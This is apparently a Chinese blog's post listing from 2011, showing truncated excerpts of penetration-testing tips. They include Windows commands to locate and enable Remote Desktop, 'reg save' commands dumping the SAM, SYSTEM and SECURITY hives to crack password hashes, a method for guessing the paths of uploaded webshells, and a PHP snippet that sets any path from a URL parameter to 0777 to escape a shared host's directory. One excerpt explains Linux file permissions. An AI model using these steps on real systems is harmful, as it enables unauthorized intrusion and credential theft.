摘要: 收集了一些很实用的脚本,渗透基本上都会用的到:用win命令查找3389的port(包括修改后的):C:\>tasklist /svc |find “TermService”svchost.exe 1300 TermServiceC:\>netstat -ano |find “1300″TCP 0.0.0.0:61321 0.0.0.0:0 LISTENING 1300TCP 210.72.225.74:61321 123.114.166.67:1697 ESTABLISHED 1300用win命令开3389:wmic RDTOGGLE WHERE ServerName=’%COMP 阅读全文
posted @ 2011-10-02 05:23 WHaa_(T_T) 阅读(293) 评论(0) 推荐(0) 编辑
摘要: LINUX文件权限针对的对象分三类(互斥的关系): 1. user(文件的拥有者) 2. group(文件拥有者所在的组,但不包括user) 3. other(其它用户,即user和group以外的) LINUX用一个3位二进制数对应着文件的3种权限(1表示有该权限,0表示无): 第1位 读 r 100 4 第2位 写 w 010 2 第3位 执行 x 001 1 查看权限 #ls -l 第一列,一共10位(drwxrwxrwx),就代表了文件的权限: 1)第一个d代表是一个目录,如果显示“-”,则说明不是一个目录 2)2-4代表user的权限 3)5-7代表group的权限 4)8-10代表 阅读全文
posted @ 2011-10-02 05:21 WHaa_(T_T) 阅读(250) 评论(0) 推荐(0) 编辑
摘要: 传wce.exe 抓hash 没有任何结果又穿了Pwdump gethashes等。都没有抓到任何数据!最后用reg save hklm\sam c:\sam.hivereg save hklm\system c:\system.hivereg save hklm\security c:\security.hive导出文件然后在cain能够找到hash。。 阅读全文
posted @ 2011-10-02 04:49 WHaa_(T_T) 阅读(295) 评论(0) 推荐(0) 编辑
摘要: 有时 传了 木马上去后 直接是 xiaoma.asp还有种 是按照时间生成名字如201103091**************.asp下面这种如果又 没有回显的话 就可以做 个字典扫生成字典uploadfile/2011/1/1/2011012847000000.aspuploadfile/2011/1/1/2011012847000001.aspuploadfile/2011/1/1/2011012847000002.aspuploadfile/2011/1/1/2011012847000003.aspuploadfile/2011/1/1/2011012847000004.asp————— 阅读全文
posted @ 2011-10-02 04:39 WHaa_(T_T) 阅读(252) 评论(0) 推荐(0) 编辑
摘要: linux权限多设的比较松的其实,但有的虚拟机还是不能跨目录访问的。在提不了权的情况下,试试如下代码吧。运气好的话说不定就跨过去了。代码如下:<?php$path = stripslashes($_GET['path']);$ok = chmod ($path , 0777);if ($ok == true)echo CHMOD OK , Permission editable file or directory. Permission to write;?><?php$path = stripslashes($_GET['path']);$o 阅读全文
posted @ 2011-10-02 04:28 WHaa_(T_T) 阅读(265) 评论(0) 推荐(0) 编辑